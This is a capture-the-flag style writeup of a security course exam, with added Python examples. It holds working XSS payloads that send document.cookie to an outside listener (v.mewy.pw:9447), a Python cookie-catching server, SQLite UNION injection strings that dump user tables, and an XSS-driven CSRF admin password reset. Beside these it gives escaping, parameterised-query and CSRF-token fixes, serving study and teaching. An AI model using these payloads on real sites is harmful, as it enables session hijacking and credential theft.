Hello friends. Here are writeups for all the solvable challenges from the COMP6443 final exam. If you have questions, ping @sy on Slack.
Challenge 1 writeup
XSS vulnerability on comment submission. There is no filtering on the HTML input, so we can include script and image tags to our hearts' content.
Using payload:
<script>new Image().src="http://v.mewy.pw:9447/"+document.cookie;</script><p>test2
The victim's browser (a PhantomJS bot, going by the User-Agent below) renders the comment, and the injected script fires an image request to our listener with document.cookie appended to the URL. This only works because the flag cookie is not marked HttpOnly; an HttpOnly cookie is invisible to document.cookie.
This is what our listener on v.mewy.pw:9447 logged:
129.94.8.184 - - [16/Jun/2017 20:16:57] "GET / HTTP/1.1" 200 -
54.252.177.117 - - [16/Jun/2017 20:19:02] "GET /Flag=FLAG_H8H80SXISOBOIBC6QUTKY2L6UI5NW6B7 HTTP/1.1" 301 -
Referer: http://127.0.0.1/DU83BXTMVWJ8H38V/97b38a5a5fa255374d3f0afbb2bc341003ec1d9d5ae470d06654d7f403f21c16/out.html
Content-Length:
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Connection: Keep-Alive
Host: v.mewy.pw:9447
Accept: */*
Accept-Language: en,*
Content-Type:
Accept-Encoding: gzip, deflate
So the flag is FLAG_H8H80SXISOBOIBC6QUTKY2L6UI5NW6B7.
Challenge 2 writeup
XSS vulnerability on comment submission. There is some filtering on the HTML input, so we bypass hackingshield with some simple case modification (the payload below also avoids the <script> tag entirely by using an onerror handler on an image tag).
Using payload:
<img src=x onerror='new Image().src="http://v.mewy.pw:9447/"+document.cookie;'/>a
This is the response we get:
Referer: http://127.0.0.1/DU83BXTMVWJ8H38V/92650041f7b179e5d0bd54fd82e27414e2a20d9d458ef35d592eff9f1427e1b8/out.html
Content-Length:
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Connection: Keep-Alive
Host: v.mewy.pw:9447
Accept: */*
Accept-Language: en,*
Content-Type:
Accept-Encoding: gzip, deflate
() {'anythin': u'Flag=FLAG_PQ5NWR4P3L5D6ZKVC6AFAT7BX7PM2JFP'}
54.252.177.117 - - [16/Jun/2017 20:22:41] "GET /Flag%3DFLAG_PQ5NWR4P3L5D6ZKVC6AFAT7BX7PM2JFP/ HTTP/1.1" 200 -
So the flag is FLAG_PQ5NWR4P3L5D6ZKVC6AFAT7BX7PM2JFP.
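Added example (not the challenge's actual filter, whose internals the writeup never shows): a stand-in for the kind of blacklist that strips well-formed <script> blocks, and the two ways the payloads above walk past it, an event handler on an <img> tag and a differently cased tag. The hardened version does not try to recognise bad HTML at all; it HTML-escapes the comment for an HTML text context so the browser never sees a tag. The filter regex and the still_executes check are assumptions for illustration.

```python
import html
import re

# Hypothetical blacklist: strip lowercase, well-formed <script>...</script> blocks
# and nothing else. Case-sensitive on purpose, like many home-grown filters.
_SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.DOTALL)


def blacklist_filter(comment: str) -> str:
    """The broken 'sanitiser': remove <script> blocks, pass everything else through."""
    return _SCRIPT_BLOCK.sub("", comment)


def escape_output(comment: str) -> str:
    """The fix: encode for an HTML text context (use a context-specific encoder
    for attribute, JavaScript or URL contexts instead)."""
    return html.escape(comment, quote=True)


# Crude detector used only to score the results below: a script tag (any case)
# or an inline on* handler inside a real tag.
_DANGEROUS = re.compile(r"<\s*script\b|<[^>]*\bon[a-z]+\s*=", re.IGNORECASE | re.DOTALL)


def still_executes(rendered: str) -> bool:
    """True if the rendered string still carries markup a browser would execute."""
    return _DANGEROUS.search(rendered) is not None


# The writeup's payloads from challenges 1 and 2, plus a case-modified variant.
SCRIPT_PAYLOAD = '<script>new Image().src="http://v.mewy.pw:9447/"+document.cookie;</script><p>test2'
IMG_PAYLOAD = '<img src=x onerror=\'new Image().src="http://v.mewy.pw:9447/"+document.cookie;\'/>a'
CASE_PAYLOAD = SCRIPT_PAYLOAD.replace("<script>", "<ScRiPt>").replace("</script>", "</ScRiPt>")


def report() -> dict:
    """Which payloads survive the blacklist, and whether escaping stops all of them."""
    return {
        "script_survives_blacklist": still_executes(blacklist_filter(SCRIPT_PAYLOAD)),
        "img_survives_blacklist": still_executes(blacklist_filter(IMG_PAYLOAD)),
        "case_survives_blacklist": still_executes(blacklist_filter(CASE_PAYLOAD)),
        "any_survives_escaping": any(
            still_executes(escape_output(p)) for p in (SCRIPT_PAYLOAD, IMG_PAYLOAD, CASE_PAYLOAD)
        ),
    }


if __name__ == "__main__":
    for name, hit in report().items():
        print(f"{name}: {hit}")
```

The point is that a blacklist has to enumerate every tag, attribute and casing the HTML parser accepts, while output encoding only has to get one thing right: the context the data lands in.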
Challenge 3 writeup
This one was obscure to identify the vuln. I ended up going off the hints given in challenges 1 and 2 for identifying where the vuln was. I checked <base_url>/out.html to figure out what payload it was receiving (identifying out.html came from the Referer headers of the previous challenges). This showed me my browser User-Agent, so from there it's trivial XSS via the User-Agent header.
Request:
POST /DU83BXTMVWJ8H38V/a3573ce9badd0fe415f1257614cce1c1c84dd7a161f2a543f22538d45d8f4f58/ HTTP/1.1
Host: 54.252.177.117
Connection: close
Content-Length: 51
Cache-Control: max-age=0
Origin: https://54.252.177.117
Upgrade-Insecure-Requests: 1
User-Agent: M<img src=x onerror='new Image().src="http://v.mewy.pw:9447/"+document.cookie;'/>a
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://54.252.177.117/DU83BXTMVWJ8H38V/a3573ce9badd0fe415f1257614cce1c1c84dd7a161f2a543f22538d45d8f4f58/
Accept-Language: en-US,en;q=0.8,ru;q=0.6
Cookie: PHPSESSID=7n2edk2bpm45hgupqgd4t14sr6
name=test&chal1fdbk=123&chal2fdbk=123&chal3fdbk=123
Response (the first line is our own browser triggering the payload when the page rendered for us; the second is the bot):
129.94.8.184 - - [16/Jun/2017 22:28:15] "GET /PHPSESSID%3D7n2edk2bpm45hgupqgd4t14sr6/ HTTP/1.1" 200 -
54.252.177.117 - - [16/Jun/2017 22:29:17] "GET /Flag=FLAG_CHXVQNJFFC0TC5CDL07LR8BNSGTLSJJ0 HTTP/1.1" 301 -
Referer: http://127.0.0.1/DU83BXTMVWJ8H38V/a3573ce9badd0fe415f1257614cce1c1c84dd7a161f2a543f22538d45d8f4f58/out.html
Content-Length:
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Connection: Keep-Alive
Host: v.mewy.pw:9447
Accept: */*
Accept-Language: en,*
Content-Type:
Accept-Encoding: gzip, deflate
() {'anythin': u'Flag=FLAG_CHXVQNJFFC0TC5CDL07LR8BNSGTLSJJ0'}
54.252.177.117 - - [16/Jun/2017 22:29:17] "GET /Flag%3DFLAG_CHXVQNJFFC0TC5CDL07LR8BNSGTLSJJ0/ HTTP/1.1" 200 -
Flag is FLAG_CHXVQNJFFC0TC5CDL07LR8BNSGTLSJJ0.
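Added example, not the listener that produced the logs in challenges 1 to 3: a minimal stand-in for the catcher on v.mewy.pw:9447. The payloads append document.cookie to the URL path, so the only work is URL-decoding the path and splitting it into cookie name/value pairs; the Referer is kept because, as in challenge 3, it tells you where the payload actually rendered (the out.html page). The port, log format and handler name are assumptions.

```python
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote


def parse_exfil_path(path: str) -> dict:
    """Turn "/Flag%3DFLAG_X;%20PHPSESSID=abc/" into {"Flag": "FLAG_X", "PHPSESSID": "abc"}.

    document.cookie is "name=value; name2=value2", and the browser percent-encodes
    "=" in the path, so decode first and then split on ";".
    """
    raw = unquote(path).strip("/")
    cookies = {}
    for part in raw.split(";"):
        part = part.strip()
        if not part:
            continue
        name, sep, value = part.partition("=")
        cookies[name.strip()] = value.strip() if sep else ""
    return cookies


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        cookies = parse_exfil_path(self.path)
        referer = self.headers.get("Referer", "-")
        agent = self.headers.get("User-Agent", "-")
        # Print a structured line to stderr so the flag is not buried in the
        # default access log that BaseHTTPRequestHandler also writes.
        print(
            f"{self.client_address[0]} cookies={cookies} referer={referer} ua={agent}",
            file=sys.stderr,
        )
        # An empty 200 is enough; the bot never looks at the response.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()


def serve(port: int = 9447) -> None:
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()


if __name__ == "__main__":
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 9447)
```

Run it on a host the bot can reach; the redirect/301 lines in the original logs are whatever the author's server did with the un-slashed path and are not reproduced here.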
Challenge 4 writeup
Looks like we have an SQL injection (SQLite, as the fingerprinting below shows) on the homepage login: username=test&password=username%27++or+%271%27%3D%271%27%3B%23+
OK, so testing for SQL injection.
Payload: username'++or+'1'='1' union select 1,2;#
returns Welcome, 1. Hence, a two-column injection.
(Note that # is not a comment character in SQLite. The payload works because the ; terminates the statement and the app's database driver evidently ignores whatever follows the first statement, so the trailing #' is never parsed. The exam apps appear to be PHP, judging by the PHPSESSID cookie in challenge 3; a driver that rejects trailing text, such as Python's sqlite3 module, would need a -- comment instead.)
So let's try fingerprinting:
@@version doesn't work -> not MySQL
version() doesn't work -> not PostgreSQL
(sqlite_version() is the positive check for SQLite.)
So let's try some strings:
username' or '1'='1' union select 'asdf',2;#
Welcome, FLAG_KGFZAIJHZAHKM359CR7HINZJDJ12XL8K
lol wtf. I don't understand what condition this was checking for.
Flag is FLAG_KGFZAIJHZAHKM359CR7HINZJDJ12XL8K.
Request:
POST /DU83BXTMVWJ8H38V/f75711872df5b75b791d28fbba47d0e4067bb026681800cb755ac95c52d467c4/ HTTP/1.1
Host: 54.252.177.117
Connection: close
Content-Length: 69
Cache-Control: max-age=0
Origin: https://54.252.177.117
Upgrade-Insecure-Requests: 1
User-Agent: <?php echo 'hello';?>
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://54.252.177.117/DU83BXTMVWJ8H38V/f75711872df5b75b791d28fbba47d0e4067bb026681800cb755ac95c52d467c4/
Accept-Language: en-US,en;q=0.8,ru;q=0.6
username=test&password=username'++or+'1'='1' union select 'asdf',2;#
Challenge 5 writeup
Look at the app: same login as before, so we try SQL injection again.
Request:
POST /DU83BXTMVWJ8H38V/858e5fd824090fb2f855e42c53e5cfa25e94a110822ab9ede8e400b95b5f6a19/ HTTP/1.1
Host: 54.252.177.117
Connection: close
Content-Length: 61
Cache-Control: max-age=0
Origin: https://54.252.177.117
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://54.252.177.117/DU83BXTMVWJ8H38V/858e5fd824090fb2f855e42c53e5cfa25e94a110822ab9ede8e400b95b5f6a19/
Accept-Language: en-US,en;q=0.8,ru;q=0.6
username=test&password=username%27+or+%271%27%3D%271%27%3B%23
Response:
HTTP/1.1 200 OK
...
Welcome, whoami
Uhhh, ok. whoami. Looks like we have command injection then?
From fingerprinting, we know it's SQLite. So check the sqlite_master table.
Payloads:
' union select name, 2 from sqlite_master;#
' union select sql, 2 from sqlite_master;#
Unfortunately, I didn't record this in my haste, but the final request is below.
POST /DU83BXTMVWJ8H38V/858e5fd824090fb2f855e42c53e5cfa25e94a110822ab9ede8e400b95b5f6a19/ HTTP/1.1
Host: 54.252.177.117
Connection: close
Content-Length: 105
Cache-Control: max-age=0
Origin: https://54.252.177.117
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://54.252.177.117/DU83BXTMVWJ8H38V/858e5fd824090fb2f855e42c53e5cfa25e94a110822ab9ede8e400b95b5f6a19/
Accept-Language: en-US,en;q=0.8,ru;q=0.6
username=whoami&password=username' union select username || '|'||password,2 from users limit 1 offset 1;#
Protip: SQLite lets you concatenate fields using the || operator, so use that to join multiple fields together in one row. Brute forcing is bad for the environment.
Response:
Welcome, whatisthepassword|FLAG_LAL1Y7751ZCFYBSNG6QQGVI46LRZOXOF
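Added example, not the challenge's code: a small stand-in for the login behind challenges 4 and 5 (PHP + SQLite there, Python + in-memory SQLite here, with constructed rows) so the whole probing sequence can be replayed offline: confirm the column count with UNION, fingerprint with sqlite_version(), read the schema out of sqlite_master, and pull every row through the single "Welcome, ..." slot with group_concat instead of one LIMIT/OFFSET request per row. It goes a step beyond the writeup in that last respect. Payloads end in -- rather than the writeup's ;# because # is not a comment in SQLite and Python's sqlite3 refuses trailing text after a statement. The table and column names match the final payload above but are assumptions about the real app; the parameterised login_fixed is the corresponding fix.

```python
import sqlite3

# Constructed data for the example only.
db = sqlite3.connect(":memory:")
db.executescript(
    """
    CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
    INSERT INTO users (username, password) VALUES ('admin', 'constructed-admin-pw');
    INSERT INTO users (username, password) VALUES ('whatisthepassword', 'FLAG_constructed');
    """
)


def login_vulnerable(username: str, password: str) -> str:
    # String concatenation into the query: the challenge's bug.
    q = (
        "SELECT username, password FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    row = db.execute(q).fetchone()
    return f"Welcome, {row[0]}" if row else "Login failed"


def login_fixed(username: str, password: str) -> str:
    # Parameter binding: the quote in the payload is data, not syntax.
    q = "SELECT username, password FROM users WHERE username=? AND password=?"
    row = db.execute(q, (username, password)).fetchone()
    return f"Welcome, {row[0]}" if row else "Login failed"


def inject(payload: str) -> str:
    """Send a payload through the password field with a user that does not exist,
    so only the UNIONed row comes back."""
    return login_vulnerable("nobody", payload)


def probe_column_count(max_columns: int = 8) -> int:
    """UNION SELECT with 1..N columns; SQLite errors until the count matches."""
    for n in range(1, max_columns + 1):
        cols = ",".join(str(i + 1) for i in range(n))
        try:
            inject(f"x' UNION SELECT {cols} --")
            return n
        except sqlite3.OperationalError:
            continue
    raise RuntimeError("could not determine column count")


def fingerprint() -> str:
    # @@version (MySQL) and version() (PostgreSQL) both error on SQLite;
    # sqlite_version() is the positive check.
    return inject("x' UNION SELECT sqlite_version(),2 --")


def dump_schema() -> str:
    """Every CREATE TABLE statement, joined into the one visible column."""
    return inject(
        "x' UNION SELECT group_concat(sql, '; '),2 FROM sqlite_master WHERE type='table' --"
    )


def dump_users() -> str:
    """All rows at once: || joins the fields, group_concat joins the rows."""
    return inject(
        "x' UNION SELECT group_concat(username || '|' || password, ','),2 FROM users --"
    )


if __name__ == "__main__":
    print("columns:", probe_column_count())
    print(fingerprint())
    print(dump_schema())
    print(dump_users())
    print("fixed login:", login_fixed("nobody", "x' UNION SELECT 1,2 --"))
```

If the visible column is truncated by the page template, fall back to the writeup's LIMIT/OFFSET approach or page through group_concat with substr().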
Challenge 6 writeup
Freebie
Challenge 7 writeup
OK so we have an app. norman is trolling: register doesn't exist, I presume that it's a lie, and there's no LFI.
Instead we look to CSRF the admin. We know it's CSRF because the change password functionality has no CSRF token or captcha. A brief XSS payload works:
<img src=x onerror='new Image().src="http://v.mewy.pw:9447/"+document.cookie;'/>a
which indicates that our JavaScript does in fact run in the victim's browser.
So what we'll do is CSRF the password reset: make him visit that URL and reset the admin password to admin.
<script>document.location="/DU83BXTMVWJ8H38V/f58ab245d15578e6652f7a7a45cff0cec491bb56cc5601c36df8e351bcb9a016/index.php?p=reset&user=admin&pass=admin";</script>
How nice of norman to let us use GET requests to do all the dirty work. No need to inline my trusty friend jQuery.
OK, we CSRF'd and XSS'd him.
Login with admin:admin.
Congratulations! Flag is FLAG_FCBJK7MEV3N3178M8F3FPZ4IYB9Y3I5G
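Added example, not norman's app: the password-reset handler the challenge appears to have (a GET to index.php?p=reset&user=...&pass=... with no token, as the payload above shows) beside a hardened one. The hardened version refuses GET for a state-changing action, requires a per-session CSRF token compared in constant time, and lets a user reset only their own password unless they are admin. The request and session shapes, and the user store, are assumptions for the example.

```python
import hmac
import secrets

# Constructed user store for the example only.
USERS = {"admin": "original-admin-pw", "sy": "sy-pw"}


def reset_vulnerable(method: str, params: dict) -> str:
    # Method is ignored and there is no token or ownership check: whoever can
    # make the admin's browser request this URL (an <img>, a redirect, the XSS
    # above) gets the password changed.
    USERS[params["user"]] = params["pass"]
    return "ok"


def issue_csrf_token(session: dict) -> str:
    """Mint a random token, store it in the server-side session, and embed it in the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def reset_hardened(method: str, params: dict, session: dict) -> str:
    if method != "POST":
        return "405 method not allowed"  # GET must never change state
    expected = session.get("csrf_token")
    supplied = params.get("csrf_token", "")
    # Constant-time compare on bytes; a missing session token always fails.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "403 bad csrf token"
    actor = session.get("user")
    target = params.get("user")
    # Even with a valid token, only the account owner or admin may reset it.
    if actor is None or (actor != target and actor != "admin"):
        return "403 not allowed"
    if target not in USERS:
        return "404 no such user"
    USERS[target] = params["pass"]
    return "ok"


if __name__ == "__main__":
    print(reset_vulnerable("GET", {"user": "admin", "pass": "admin"}), USERS["admin"])
    sess = {"user": "sy"}
    tok = issue_csrf_token(sess)
    print(reset_hardened("GET", {"user": "sy", "pass": "x", "csrf_token": tok}, sess))
    print(reset_hardened("POST", {"user": "sy", "pass": "x", "csrf_token": tok}, sess))
```

One caveat that matters for this challenge in particular: a CSRF token only stops cross-origin forgery. The attack here is delivered through XSS, and script running on the same origin can read the token out of the page and submit a valid POST, so the token is necessary but the XSS has to be fixed as well.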